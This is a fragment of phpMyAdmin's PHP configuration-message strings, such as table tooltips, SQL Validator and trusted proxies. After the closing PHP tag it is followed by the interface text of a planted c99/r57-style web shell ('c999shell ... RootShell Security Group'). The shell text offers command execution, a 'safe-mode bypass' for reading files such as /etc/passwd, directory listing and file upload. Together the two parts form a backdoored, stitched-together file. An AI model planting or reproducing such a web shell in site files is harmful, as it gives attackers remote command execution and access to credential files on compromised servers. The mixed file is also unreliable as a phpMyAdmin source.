$strConfigShowTooltipAliasTB_desc __('When setting this to [kbd]nested[/kbd], the alias of the table name is only used to split/nest the tables according to the $cfg[\'LeftFrameTableSeparator\'] directive, so only the folder is called like the alias, the table name itself stays unchanged');
$strConfigShowTooltipAliasTB_name __('Display table comment instead of its name');
$strConfigShowTooltip_name __('Display table comments in tooltips');
$strConfigSkipLockedTables_desc __('Mark used tables and make it possible to show databases with locked tables');
$strConfigSkipLockedTables_name __('Skip locked tables');
$strConfigSQLQuery_Edit_name __('Edit');
$strConfigSQLQuery_Explain_name __('Explain SQL');
$strConfigSQLQuery_Refresh_name __('Refresh');
$strConfigSQLQuery_ShowAsPHP_name __('Create PHP Code');
$strConfigSQLQuery_Validate_desc __('Requires SQL Validator to be enabled');
$strConfigSQLQuery_Validate_name __('Validate SQL');
$strConfigSQLValidator_password_name __('Password');
$strConfigSQLValidator_use_desc __('[strong]Warning:[/strong] requires PHP SOAP extension or PEAR SOAP to be installed');
$strConfigSQLValidator_use_name __('Enable SQL Validator');
$strConfigSQLValidator_username_desc __('If you have a custom username, specify it here (defaults to [kbd]anonymous[/kbd])');
$strConfigSQLValidator_username_name __('Username');
$strConfigSuggestDBName_desc __('Suggest a database name on the &quot;Create Database&quot; form (if possible) or keep the text field empty');
$strConfigSuggestDBName_name __('Suggest new database name');
$strConfigSuhosinDisableWarning_desc __('A warning is displayed on the main page if Suhosin is detected');
$strConfigSuhosinDisableWarning_name __('Suhosin warning');
$strConfigTextareaCols_desc __('Textarea size (columns) in edit mode, this value will be emphasized for SQL query textareas (*2) and for query window (*1.25)');
$strConfigTextareaCols_name __('Textarea columns');
$strConfigTextareaRows_desc __('Textarea size (rows) in edit mode, this value will be emphasized for SQL query textareas (*2) and for query window (*1.25)');
$strConfigTextareaRows_name __('Textarea rows');
$strConfigTitleDatabase_desc __('Title of browser window when a database is selected');
$strConfigTitleDatabase_name __('Database');
$strConfigTitleDefault_desc __('Title of browser window when nothing is selected');
$strConfigTitleDefault_name __('Default title');
$strConfigTitleServer_desc __('Title of browser window when a server is selected');
$strConfigTitleServer_name __('Server');
$strConfigTitleTable_desc __('Title of browser window when a table is selected');
$strConfigTitleTable_name __('Table');
$strConfigTrustedProxies_desc __('Input proxies as [kbd]IP: trusted HTTP header[/kbd]. The following example specifies that phpMyAdmin should trust a HTTP_X_FORWARDED_FOR (X-Forwarded-For) header coming from the proxy 1.2.3.4:[br][kbd]1.2.3.4: HTTP_X_FORWARDED_FOR[/kbd]');
$strConfigTrustedProxies_name __('List of trusted proxies for IP allow/deny');
$strConfigUploadDir_desc __('Directory on server where you can upload files for import');
$strConfigUploadDir_name __('Upload directory');
$strConfigUseDbSearch_desc __('Allow for searching inside the entire database');
$strConfigUseDbSearch_name __('Use database search');
$strConfigUserprefsDeveloperTab_desc __('When disabled, users cannot set any of the options below, regardless of the checkbox on the right');
$strConfigUserprefsDeveloperTab_name __('Enable the Developer tab in settings');
$strConfigVerboseMultiSubmit_desc __('Show affected rows of each statement on multiple-statement queries. See libraries/import.lib.php for defaults on how many queries a statement may contain.');
$strConfigVerboseMultiSubmit_name __('Verbose multiple statements');
$strConfigVersionCheckLink __('Check for latest version');
$strConfigVersionCheck_desc __('Enables check for latest version on main phpMyAdmin page');
$strConfigVersionCheck_name __('Version check');
$strConfigZipDump_desc __('Enable [a@http://en.wikipedia.org/wiki/ZIP_(file_format)]ZIP[/a] compression for import and export operations');
$strConfigZipDump_name __('ZIP');

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0177 ]--